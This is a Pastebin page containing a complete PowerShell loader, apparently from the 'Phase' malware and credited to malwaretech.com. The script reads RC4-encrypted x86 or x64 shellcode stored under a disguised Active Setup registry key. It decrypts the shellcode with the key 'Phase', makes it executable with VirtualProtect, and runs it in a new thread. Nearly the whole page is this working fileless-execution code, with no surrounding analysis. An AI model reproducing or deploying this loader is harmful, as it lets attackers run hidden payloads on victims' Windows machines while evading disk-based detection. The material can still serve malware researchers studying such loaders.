SHARE
TWEET

Phase PowerShell Script

a guest Dec 11th, 2014 1,175 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Read And Execute Rc4 Encrypted ShellCode From The Registry
  2.  
  3. # Set Registry Key
  4. $sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';
  5.  
  6. # Set Key For Key Stream
  7. [Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");
  8.  
  9. # Import Native Functions
  10. $sCode = @"
  11. [DllImport("kernel32.dll")]
  12. public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
  13. [DllImport("kernel32.dll")]
  14. public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
  15. [DllImport("kernel32.dll")]
  16. public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
  17. "@
  18.  
  19. # Make The Code Recognized By PowerShell
  20. $pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru
  21.  
  22. # Declare Shellcode Array
  23. [Byte[]]$bShellCode;
  24.  
  25. # Check Pointer Size To Check If x64
  26. if ([IntPtr]::Size -eq 8) {
  27.         # Load Encrypted x64 Shellcode From Registry
  28.         $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
  29. }else{
  30.         # Load Encrypted x86 Shellcode From Registry
  31.         $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
  32. }
  33.  
  34. # Define Byte Arrays That Are The Boxes
  35. [Byte[]]$s = New-Object Byte[] 256;
  36. [Byte[]]$k = New-Object Byte[] 256;
  37.  
  38. # Loop from 0 to 255 to fill the boxes
  39. for ($i = 0; $i -lt 256; $i++){
  40.         # Fill Box S With 0-255
  41.         $s[$i] = [Byte]$i;
  42.        
  43.         # Fill Box K With (0-255)/dwKeyLen
  44.         $k[$i] = $bKey[$i % $bKey.Length];
  45. }
  46.  
  47. # Initialize j
  48. $j = 0;
  49.  
  50. # Loop Through All 256 Bytes
  51. for ($i = 0; $i -lt 256; $i++){
  52.         $j = ($j + $s[$i] + $k[$i]) % 256;
  53.        
  54.         # Hold Temporary Value Of S[i] For Swapping
  55.         $bSwap = $s[$i];
  56.        
  57.         # Set S[i] With S[j]
  58.         $s[$i] = $s[$j];
  59.        
  60.         # Set S[j] With Old Value Of S[i]
  61.         $s[$j] = $bSwap;
  62. }
  63.  
  64. # Initialize i
  65. $i = 0;
  66.  
  67. # Initialize j
  68. $j = 0;
  69.  
  70. # Loop Through The Bytes In The Buffer
  71. for ($x = 0; $x -lt $bShellCode.Length; $x++){
  72.         # Pseudo-Random Generation Algorithm
  73.         $i = ($i + 1) % 256;
  74.         $j = ($j + $s[$i]) % 256;
  75.        
  76.         # Hold Temporary Value Of S[i] For Swapping
  77.         $bSwap = $s[$i];
  78.        
  79.         # Set S[i] With S[j]
  80.         $s[$i] = $s[$j];
  81.        
  82.         # Set S[j] With Old Value Of S[i]
  83.         $s[$j] = $bSwap;
  84.         [int]$t = ($s[$i] + $s[$j]) % 256;
  85.        
  86.         # Xor PlainText With KeyStream
  87.         $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
  88. }
  89.  
  90. # Check What Size We Should Allocate
  91. $dwSize = $bShellCode.Length;
  92.  
  93. # Check Size Of ShellCode
  94. if ($dwSize -gt 0x00000000){
  95.         # Variable To Hold Old Protection Flags
  96.         [Int[]]$dwOldProt = 0x00000000;
  97.  
  98.         # Get Pointer To $dwOldProt
  99.         $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)
  100.  
  101.         # Set Read/Write/Execute Flags On ShellCode
  102.         if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){             
  103.                 # Create A New Thread To Execute Our ShellCode
  104.                 $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
  105.                
  106.                 # Wait For Our Thread
  107.                 $pFunctions::WaitForSingleObject($hThread, -1);
  108.         }
  109. }
  110.  
  111. www.malwaretech.com
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top